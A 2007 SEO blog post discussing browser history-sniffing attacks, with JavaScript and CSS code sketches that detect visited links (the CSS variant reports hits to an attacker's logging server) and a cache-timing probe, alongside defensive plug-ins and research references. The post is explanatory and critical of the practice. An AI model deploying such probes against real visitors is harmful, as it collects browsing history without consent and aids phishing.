Competitive research or privacy attack?

by Hamlet Batista | June 02, 2007 | 1 Comments

I found an interesting tool via Seobook.com. It exploits a “feature” of current browsers: they do not properly partition persistent client-side state (visited links and cached content) on a per-site basis.

The tool can identify URLs in your visitor’s browsing history. Aaron suggests this be used to check if your visitors come from competing sites and adjust your marketing strategy accordingly.

This might not work as Aaron expects. You can only tell that the visitor opened those URLs at some point in the last n days (where n is the number of days the user keeps in his or her browsing history). You won’t be able to tell when, how often or how recently those URLs were visited.

While this is very useful for marketing purposes, it also leaves plenty of room for abuse. Collecting information on users without their consent doesn’t sound very good either.

Reader Dave comments:

I’ve always been conscious of the technical possibility of this and taken some safeguards against it. Still, as a user, I’d be furious if I knew this technique were being used on me, and I will be keeping my eye out for any precedent-setting legal challenges to this.

As a publisher/affiliate, I refuse to stoop this low. It’s disappointing but not unexpected that a great deal of readers here would be so sanguine about something so blatantly unethical.

Your user’s history object is none of your [edited] business.

Imagine a phisher who uses this to identify the on-line bank you use. With this information, his scam will be far more effective, because most people ignore emails from institutions they are not affiliated with.

Another reader pointed to a Firefox plug-in that solves the visited-link based attack problem. Here is another plug-in that prevents cache-based attacks. I installed both of them immediately.

The tool Aaron mentions exploits the visited-link vulnerability. Here is how it works:

Your browser, by default, displays visited links in a different color than unvisited ones. That information is available via CSS and client-side JavaScript. The script pulls a list of target URLs using Ajax (this happens with no user action), inspects the color of each link, and flags the ones that have the visited-link color: these are the ones the visitor has previously visited.

     if (link.currentStyle) {
          var color = link.currentStyle.color;
          if (color == '#ff0000') /* Here is the color inspection */
               return true;
          return false;
     }

This is possible because browsers apply the visited-link styling no matter which site the link appears on; they do not check that the page showing the link belongs to the same domain as the link’s target. It is very likely this will be fixed in future browser releases.
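To make the steps concrete, here is a rough sketch of the loop around the color check. It is not the code of the tool Aaron mentions. The function names, the `doc` parameter and the `readColor` callback are assumptions made for illustration, and the visited color is whatever the page’s own stylesheet assigns. Browsers released after this post restrict what scripts can read about visited links, so treat this as an illustration of the technique as described rather than something that works today.

```javascript
// Sketch only. `doc` is any object offering createElement plus
// body.appendChild / body.removeChild (in a browser, pass `document`).
// `readColor` is a hypothetical callback returning a link's rendered color.
function findVisitedUrls(urls, doc, readColor, visitedColor) {
  var visited = [];
  for (var i = 0; i < urls.length; i++) {
    var link = doc.createElement('a');
    link.href = urls[i];
    doc.body.appendChild(link); // the link has to be in the page to be styled
    if (readColor(link) === visitedColor) {
      visited.push(urls[i]); // color matches the visited-link color
    }
    doc.body.removeChild(link);
  }
  return visited;
}

// One possible readColor for a browser: currentStyle, as in the fragment
// above, with a getComputedStyle fallback. The format of the returned string
// varies by browser, so visitedColor must be given in the same format.
function readColorInBrowser(link) {
  if (link.currentStyle) {
    return link.currentStyle.color;
  }
  return window.getComputedStyle(link, null).color;
}
```

In a page, the call would look something like `findVisitedUrls(targets, document, readColorInBrowser, '#ff0000')`, where `targets` is the list of URLs pulled from the server.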

It might seem that disabling JavaScript solves the problem, but this trick can also be done with CSS alone. See https://www.indiana.edu/~phishing/browser-recon
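One common way to do this without any script in the visitor’s browser is to give each target link its own :visited rule that loads a background image from the attacker’s server. The browser requests the image only for links it styles as visited, so the answer shows up in the server’s request log. The sketch below generates such a page fragment on the server side. It is an assumption about how a CSS-only variant can work, not a description of the linked demo, and `reportBase`, the `probeN` ids and both function names are hypothetical.

```javascript
// Escape text for use inside a double-quoted HTML attribute.
function escapeAttr(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;');
}

// One <a> element per target URL, each with a unique id (probe0, probe1, ...).
function buildProbeLinks(urls) {
  var html = [];
  for (var i = 0; i < urls.length; i++) {
    html.push('<a id="probe' + i + '" href="' + escapeAttr(urls[i]) + '"></a>');
  }
  return html.join('\n');
}

// One :visited rule per link. `reportBase` is a hypothetical logging URL and
// is assumed to contain no quote characters.
function buildProbeCss(urls, reportBase) {
  var rules = [];
  for (var i = 0; i < urls.length; i++) {
    rules.push(
      'a#probe' + i + ':visited { background-image: url("' +
      reportBase + '?hit=' + i + '"); }'
    );
  }
  return rules.join('\n');
}
```

As with the script-based check, browsers have since limited which properties a :visited rule may change, so this is shown only to explain why turning off JavaScript was not enough.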

Another form of attack, not used by the tool, is measuring the time the browser takes to open target URLs. URLs that have been visited are generally cached and load faster. By comparing timing information, one can tell whether a page was visited or not.
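The timing idea can be sketched in two parts: measure how long a resource takes to load, then compare the measurement against a cutoff. Everything named here is an assumption for illustration: `load` stands for any function that starts loading a URL and returns a Promise that resolves once it has loaded, `now` is a clock function, and the threshold is a made-up value that a real attacker would have to calibrate, since network noise makes single measurements unreliable.

```javascript
// Measure the elapsed time of one load. `load` and `now` are supplied by the
// caller (hypothetical helpers, e.g. an image loader and Date.now).
function measureLoadTime(url, load, now) {
  var start = now();
  return load(url).then(function () {
    return now() - start; // elapsed time in the clock's units
  });
}

// Given a map of URL -> measured load time in ms, return the URLs that
// loaded faster than thresholdMs and are therefore guessed to be cached.
function likelyCached(timingsMs, thresholdMs) {
  var hits = [];
  for (var url in timingsMs) {
    if (Object.prototype.hasOwnProperty.call(timingsMs, url) &&
        timingsMs[url] < thresholdMs) {
      hits.push(url);
    }
  }
  return hits;
}
```

A fast load only suggests that the resource was cached; it does not say when or how often the page was visited, which is the same limitation as the visited-link check.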

The plug-ins mentioned above protect against both types of attacks.

For more information visit: http://crypto.stanford.edu/sameorigin/

See also these papers for more background information:

Protecting browser state from web privacy attacks
Invasive browser sniffing and counter measures
Timing attacks on web privacy

Hamlet Batista

Chief Executive Officer

Hamlet Batista is CEO and founder of RankSense, an agile SEO platform for online retailers and manufacturers. He holds US patents on innovative SEO technologies, started doing SEO as a successful affiliate marketer back in 2002, and believes great SEO results should not take 6 months.
